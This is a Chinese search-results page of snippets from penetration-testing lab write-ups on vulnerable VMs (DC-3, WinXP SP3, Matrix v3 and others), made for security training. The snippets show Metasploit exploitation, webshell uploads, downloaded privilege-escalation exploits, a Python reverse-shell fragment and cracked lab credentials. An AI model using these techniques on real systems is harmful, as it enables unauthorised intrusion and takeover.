- 综合排序
- 最热优先
- 最新优先
- 来自专栏简言之
靶机:WinXPenSP3
WinXPenSP3靶机安装与配置 靶机下载地址: 下载链接:https://jwt1399.lanzoui.com/iv2VJde68vc 安装&配置: 1.下载好压缩包解压,导入VWware,启动 >双击Internet Protocol(TCP/IP)–>勾选Obtain an IP address automatically 3.将该靶机网络适配器改为桥接模式,你的攻击机也改为桥接模式,保证他俩能正常通信 WinXPenSP3的漏洞&利用 2.利用漏洞Getshell 3.提权&持久化:增加Administrators权限用户,攻击机监听端口等待反弹shell,上传木马客服端程序,添加注册表信息,设置木马程序开机自启动等 use exploit/windows/smb/ms08_067_netapi show options #可以看到RHOSTS必须设置 3)设置RHOSTS(远程IP),即靶机的ip,然后run或者 ,具体对靶机的影响暂时不知
1.4K32编辑于 2023-01-01 - 来自专栏渗透靶机
Vulnhub靶机:DC-3
部署方法 官网:https://www.vulnhub.com 1.在官网搜索你想要的镜像,然后下载【建议下载 (Mirror)版本】 2.下载好后解压得到.ova的文件,右击选择VMware进行打开 3. arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.30.4后使用namp扫描靶机 nmap 192.168.30.4 -A 这里观察到DC-2靶机开放了 80。 80端口运行的是Joomla的CMS。 浏览器验证一下。 因为是Joomla我们直接用现成的工具去扫描。 看了一下我们要先下载,然后存到靶机里面启动脚本。 这样就拿到root权限了。 拿到Flag 结束本次渗透了。 后续 我个人感觉本次提权挺难的,花了挺长时间的。
40710编辑于 2025-01-10 - 来自专栏靶机渗透
靶机渗透DC-3
扫描靶机 图片.png nmap,开放了80端口,访问。 图片.png 没什么重要信息,扫描后台地址。 图片.png 访问。 图片.png 利用插件识别CMS信息。 图片.png 保存后的路径是/templates/beez3/shell.php 访问看看。 图片.png 蚁剑连接,方便快捷。 图片.png 接下来收集下靶机系统信息。 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip 下载下来,并上传到靶机上面 当然其实可以直接在靶机上面下载,毕竟都GetShell了嘛。 图片.png 然后就是解压编译的事情。 图片.png 但是我这里遇到一个问题,编译之后运行./doubleput,却没有成功提权。
92840发布于 2020-04-16 - 来自专栏渗透靶机
Vulnhub靶机:Lower3
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.50后使用namp扫描靶机。 连上靶机之后cp一个php给他就可以了。我这里用的是蚁剑生成的。mount -t nfs 192.168.30.50:/var/www/html ~/wj其实可以直接传反弹的php。然后就安排老三套。 这里呢,先从靶机哪里拿一个/bin/bash过来,然后呢在靶机上我们是low用户,所以cp过来的文件权限也是low的。 然后到靶机上运行就拿到root权限了。
26810编辑于 2025-04-24 - 来自专栏Ms08067安全实验室
【Vulnhub靶机系列】DC3
这里可以直接看出DC3的IP地址为192.168.61.163 然后我们使用nmap对目标进行扫描 发现目标主机只是打开了80端口 ? 然后我们查看下80端口,通过wappalyzer,发现用的是Joomla 同时主页也给我们提示,表明这个靶机只有一个flag ? ? 这里编辑Beez3模板 ? 这里我在html目录下创建了一个名为dfz.php的webshell ? https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐ sploits/39772.zip 通过蚁剑上传到靶机 /dcow -s 尝试提权 然后靶机就死机了,说明这个EXP不适合 ?
94130发布于 2021-05-11 - 来自专栏白帽技术与网络安全
Metasploitable3靶机搭建教程
1 前言 ---- 在学习metasploit时我们往往需要一个靶场,下面为大家介绍一下如何在虚拟机中安装metasploitable 3靶场。 Metasploitable3是Metasploitable2的升级版本,它是一个虚拟靶机系统,里面含有大量未被修复的安全漏洞,它主要是用于metasploit-framework测试的漏洞目标。 不过Metasploitable3的好处是除了是升级版之外,还可以生成Windows版本和Linux版本,具体就是指可以生成windows_2008_r2和ubuntu_1404这两种不同的系统。 在Github上也有官方的安装说明可做参考:https://github.com/rapid7/metasploitable3(我已将我自己构建的靶场上传至百度云,需要的小伙伴请自取,metasploit 以及VMware的安装我就不给大家介绍了,下面开始正式的安装 4 使用packer构建 ---- 以管理员权限打开Powershell 在Powershell里面cd到metasploitable3目录下
3.1K20编辑于 2022-06-02 - 来自专栏吾生也有涯IT也无涯
VulnHub靶机渗透之DC:3
这次练习的是DC系列靶机的第三个(一共6个)DC-3靶机下载地址https://download.vulnhub.com/dc/DC-3VMware.zip,有兴趣可自行下载。 第一步依然是nmap扫描,不再赘述,此靶机只开放了80端口,从扫描结果中可以发现网站使用了Joomla,看来是唯一的着手点了。 ? 访问一下网站,没发现有什么线索,这个靶机只有一个flag,没有其他提示。 ? 利用Joomlascan扫描网站,得到了Joomla版本和后台管理的路径。 ? 根据exploitdb中提供的连接下载提权攻击脚本到dc-3靶机的/tmp目录下。 ? 解压缩并编译,warning忽略,不予理会。 ? 执行编译后的文件,成功获得root shell。 ? 3,破解密码登录后台,上传webshell。 4,寻找适用的漏洞进行提权。
3.7K20发布于 2019-07-25 - 来自专栏/root
vulnhub靶机实战DC-3
下载 靶机下载链接汇总:https://download.vulnhub.com/ 使用搜索功能,搜索dc类型的靶机即可。 本次实战使用的靶机是:DC-3(Ubuntu) 下载链接:https://download.vulnhub.com/dc/archive/DC-3.zip 启动 下载完成后,打开VMware软件,通过左上角文件打开 启动成功图 扫描 本次实践ip网段为:192.168.198.0/24 攻击机IP为:192.168.198.129 未开启DC3靶机nmap扫描 nmap -sP 192.168.198.0/24 # 192.168.198.129 # Host is up. # Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds 开启DC3靶机 nmap扫描 nmap -sP 192.168.198.0/24 # 结果 并没有扫描到DC3靶机IP,尝试重启靶机 # Starting Nmap 7.94SVN ( https://nmap.org
62210编辑于 2025-09-28 - 来自专栏web安全(One)
红日内网靶机练习3
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网) win2008
93610发布于 2021-07-12 - 来自专栏OneMoreThink的专栏
靶机实战(3):GlasgowSmile-v1.1
使用命令searchsploit Joomla 3.7发现只有3个不知能否利用的SQLi漏洞,根据介绍尝试利用后,发现都不能利用,真是白忙活了大半天。 一共找到3个登录接口,挑一个简单的来爆破。 重点爆破猜到的几个用户名:admin、joomla、joker,但是完全没收获。 就连SSH也用这几个用户名再爆破了一次,也是完全没有收获。 02-05-02、于是尝试Templates的模板上传,有Beez3和Protostar两个模板,随便选择一个。 entry/glasgow-smile-11,491/ [2] 如何查看Joomla版本: https://docs.joomla.org/How_to_check_the_Joomla_version%3F [3] How to use the Template Manager: https://docs.joomla.org/Special:MyLanguage/J3.x:How_to_use_the_Template_Manager
66110编辑于 2024-10-15 - 来自专栏渗透靶机
vulnyx靶机:Diff3r3ntS3c
部署方法官网:https://vulnyx.com/1.在官网搜索你想要的镜像,然后下载2.下载好后解压得到.ova的文件,右击选择VMware进行打开3.在弹出的框中,选择存放的位置,然后点击导入4. arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.18后使用namp扫描靶机。 所以他有1,2,3,4。文件夹,直接看最后一个。是有的,rever文件的内容是弹一个shell给kali。用kali接一下。拿到shell后就安排老三套。这里可以提权,看一下大概是什么。 后续这个靶机没什么难度。
61100编辑于 2025-01-23 - 来自专栏网络安全攻防
应急响应靶机训练-Web3
基本介绍 本靶机是应急响应靶机训练的WEB系列中的第三个靶场,你需要通过应急分析排查解决一下问题: 攻击者的两个IP地址 攻击者隐藏用户名称 三个攻击者留下的flag 环境构建 下载靶机并使用VMware Workstation打开: 账号密码: 用户:administrator 密码:xj@123456 靶场题目 运行桌面的"解题"程序后会出现如下界面: 题目内容如下: 1.攻击者的两个IP地址 2.攻击者隐藏用户名称 3. 在这里我们检索第二个文件的时候并未检索到对应的记录信息,日志中有另外一个IP地址——192.168.75.130,随意判端是此IP地址 第二问答 靶机的第二个问题是"攻击者隐藏用户名称",我们这里直接使用 D盾可以检测到对应的隐藏账号——hack6618$ 第三问答 靶机的第三个问题是"三个攻击者留下的flag",关于这一个问题,我们在查看计划任务的时候发现第一个flag——flag{zgsfsys@sec nologin"工具: 随后我们上次nologin.php到服务器端并进行访问: 在这里我们直接选择登录,随后在检索查看后台的时候发现第三个flag: 文末小结 本篇文章我们主要介绍了应急响应靶场系列的WEB3,
82000编辑于 2025-01-09 - 来自专栏吾生也有涯IT也无涯
VulnHub靶机渗透之Matrix:v3
这一次的靶机难度为中等难度,有所提升,以黑客帝国电影为背景,有点中二,感兴趣可以自行下载研究,下载连接如下:https://download.vulnhub.com/matrix/Machine_Matrix_v3 .ova 靶机环境为自动获取IP,第一步先要找到靶机的IP,可以在路由器的dhcp列表里找,也可以扫描,方法很多,达到目的就好。 利用guest成功ssh到靶机。 ? 不过这个shell只能执行几个简单的命令,需要想办法绕过,找到sh或bash的shell。 ? 利用vi执行/bin/sh,拿到sh shell。 ? 然后用triniry这个用户ssh登陆靶机,成功拿到了trinity的shell。 ?
1.4K40发布于 2019-07-25 - 来自专栏vulnhub DC 1-9
VulnHub DC-3 靶机渗透测试笔记
VulnHub DC-3 靶机渗透测试笔记靶机信息靶机名称:DC-3靶机来源:VulnHub目标:获取 root 权限,找到最终 flag难度:⭐⭐⭐☆☆(中等)涉及技术:信息收集、Joomla 漏洞利用 DC-3192.168.168.254 → DHCP 服务器1.2 端口与服务扫描对目标进行全端口详细扫描:nmap -A -p- 192.168.168.129DC-3 只开放了 80 端口,攻击面集中在 ,也可以不用)通过 MSF 上传 PHP Webshell 到 Web 目录:upload '/home/kali/桌面/shell.php' /var/www/html/templates/beez3浏览器访问确认 因为脏牛的一个exp失败了,就中间这个,靶机崩了,下面的就是脏牛的,先编译,后续不写了,靶机崩了3次)注:直接用脏牛(40611.c)时靶机容易崩溃,因此换用了更稳定的 eBPF 利用方式。 靶机学习笔记,所有操作均在本地搭建的靶场环境中完成,仅用于学习交流。
24110编辑于 2026-03-06 - 来自专栏渗透云笔记
靶机练习 | DC:2 靶机渗透练习
Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com 使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3: Address: 08:00:27:69:46:72 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3. Version 3.7.2 WPScan.io - Online WordPress Vulnerability Scanner @_WPScan_, @ethicalhack3r
2.1K20发布于 2019-10-14 - 来自专栏全栈程序员必看
owasp靶机安装_靶机是什么
owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。
1.1K10编辑于 2022-09-21 - 来自专栏网络安全自修室
每周打靶 | Vulnhub-five3靶机渗透实战
2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第11台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 靶机可从Vulnhub平台 免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! 攻击机:Kali Linux 靶机环境:192.168.241.148 所用工具:nmap | knockd | hydra 0x01 知识点 drupal文件读取漏洞 knock ssh 0x02 信息搜集 mysql',| ||'prefix' => '',| 根据之前的信息发现只开启了80端口,是否22端口存在打开方式,去看看/etc/knockd.conf文件,果然需要敲5004,4284,6872这3个类似
61610编辑于 2023-11-23 - 来自专栏靶机复现
blogger靶机
wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机 接下来进行提权,再次上传可以执行系统命令的文件,注意改成get方式提交,post也可以不过需要hackbar工具,这里为了方便使用get image.png 使用python反弹shell a=python3 os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' 成功反弹shell image.png 获取一个交互式shell python3
53810编辑于 2022-04-12 - 来自专栏FreeBuf
JIS-CTF靶机+Kioptrix靶机渗透
JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 The 2nd flag is : {7412574125871236547895214} username : admin password : 3v1l_H@ck3r ? The 4th flag is : {7845658974123568974185412} username : technawi password : 3vilH@ksor 前面我们看到该靶机开启了SSH 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ? *本文原创作者:D3,转载请注明来自FreeBuf.COM
1.2K40发布于 2018-07-30 - 来自专栏闪石星曜CyberSecurity
靶机练习 | DC:2 靶机渗透练习
---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com 使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3: Address: 08:00:27:69:46:72 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3. Version 3.7.2 WPScan.io - Online WordPress Vulnerability Scanner @_WPScan_, @ethicalhack3r
94120发布于 2019-10-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号